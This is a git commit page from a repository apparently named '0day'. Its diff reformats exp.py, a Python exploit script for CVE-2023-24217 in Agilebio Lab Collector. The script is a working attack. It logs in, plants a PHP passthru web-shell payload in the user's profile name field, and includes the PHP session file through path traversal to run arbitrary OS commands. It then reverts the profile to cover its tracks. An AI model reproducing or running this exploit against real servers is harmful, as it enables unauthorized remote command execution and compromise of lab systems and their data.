admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

code format

Browse Source
This commit is contained in:
helloexp 2023-03-08 15:36:20 +08:00
parent e2b371ef33
commit d18d576a30
1 changed files with 85 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

146
100-各种CMS/Agilebio Lab Collector Electronic Lab Notebook/exp.py
View File

@ -11,30 +11,40 @@ from string import ascii_lowercase, ascii_uppercase, digits
import re import re
from base64 import b64encode from base64 import b64encode
from urllib.parse import quote_plus from urllib.parse import quote_plus
sess:Session = Session()
sess: Session = Session()
cookies = {} cookies = {}
headers = {} headers = {}
state = {} state = {}
def random_string(length:int) -> str:
return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))
def login(base_url:str, username:str, password:str) -> bool: def random_string(length: int) -> str:
data = {"login": username, "pass": password, "Submit":"", "action":"login"} return "".join(choice(ascii_lowercase + ascii_uppercase + digits) for i in range(length))
headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"
res = sess.post(f"{base_url}/login.php", data=data, headers=headers)
if("My profile" in res.text): def login(base_url: str, username: str, password: str) -> bool:
return res.text data = {"login": username, "pass": password, "Submit": "", "action": "login"}
else: headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"
return None res = sess.post(f"{base_url}/login.php", data=data, headers=headers)
def logout(base_url:str) -> bool: if ("My profile" in res.text):
return res.text
else:
return None
def logout(base_url: str) -> bool:
headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update" headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update"
sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers) sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate", headers=headers)
def extract_field_value(contents, name):
value = re.findall(f'name="{name}" value="(.*)"', contents) def extract_field_value(contents, name):
if(len(value)): value = re.findall(f'name="{name}" value="(.*)"', contents)
return value[0] if (len(value)):
else: return value[0]
return "" else:
def get_profile(html:str): return ""
def get_profile(html: str):
return { return {
"contact_name": extract_field_value(html, "contact_name"), "contact_name": extract_field_value(html, "contact_name"),
"contact_lab": extract_field_value(html, "contact_lab"), "contact_lab": extract_field_value(html, "contact_lab"),
@ -45,51 +55,65 @@ def get_profile(html:str):
"contact_tel": extract_field_value(html, "contact_tel"), "contact_tel": extract_field_value(html, "contact_tel"),
"contact_email": extract_field_value(html, "contact_email") "contact_email": extract_field_value(html, "contact_email")
} }
def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:
def update_profile(base_url: str, wrapper: str, param: str, data: dict) -> bool:
headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update" headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update"
res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers) res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers)
return True return True
def execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):
def execute_command(base_url: str, wrapper: str, param: str, session_path: str, cmd: str):
session_file = sess.cookies.get("PHPSESSID") session_file = sess.cookies.get("PHPSESSID")
headers["Referer"] = f"{base_url}/login.php?%2F" headers["Referer"] = f"{base_url}/login.php?%2F"
page = f"../../../../../..{session_path}/sess_{session_file}" page = f"../../../../../..{session_path}/sess_{session_file}"
res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers) res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}",
return parse_output(res.text, wrapper) headers=headers)
return parse_output(res.text, wrapper)
def exploit(args) -> None: def exploit(args) -> None:
wrapper = random_string(5) wrapper = random_string(5)
param = random_string(3) param = random_string(3)
html = login(args.url, args.login_username, args.login_password) html = login(args.url, args.login_username, args.login_password)
if(html == None): if (html == None):
print("unable to login") print("unable to login")
return False return False
clean = get_profile(html) clean = get_profile(html)
data = get_profile(html) data = get_profile(html)
tag = b64encode(wrapper.encode()).decode() tag = b64encode(wrapper.encode()).decode()
payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>" payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>"
data["contact_name"] = payload #inject payload in name field data["contact_name"] = payload # inject payload in name field
if(update_profile(args.url, wrapper, param, data)): if (update_profile(args.url, wrapper, param, data)):
login(args.url, args.login_username, args.login_password) # reload the session w/ our payload login(args.url, args.login_username, args.login_password) # reload the session w/ our payload
print(execute_command(args.url, wrapper, param, args.sessions, args.cmd)) print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))
update_profile(args.url, wrapper, param, clean) # revert the profile update_profile(args.url, wrapper, param, clean) # revert the profile
logout(args.url) logout(args.url)
def parse_output(contents, wrapper) -> None: def parse_output(contents, wrapper) -> None:
matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL) matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL)
if(len(matches)): if (len(matches)):
return matches[0] return matches[0]
return None return None
def main() -> None: def main() -> None:
parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217") parser: ArgumentParser = ArgumentParser(description="CVE-2023-24217")
parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.") parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.")
parser.add_argument("--login-username", "-lu", required=True, help="Username.") parser.add_argument("--login-username", "-lu", required=True, help="Username.")
parser.add_argument("--login-password", "-lp", required=True, help="Password.") parser.add_argument("--login-password", "-lp", required=True, help="Password.")
parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.") parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.")
parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.") parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/",
args = parser.parse_args() help="The location where php stores session files.")
if(args.url.endswith("/")): args = parser.parse_args()
args.url = args.url[:-1] if (args.url.endswith("/")):
if(args.sessions.endswith("/")): args.url = args.url[:-1]
args.sessions = args.sessions[:-1] if (args.sessions.endswith("/")):
exploit(args) args.sessions = args.sessions[:-1]
pass exploit(args)
if(__name__ == "__main__"): pass
main()
if __name__ == "__main__":
main()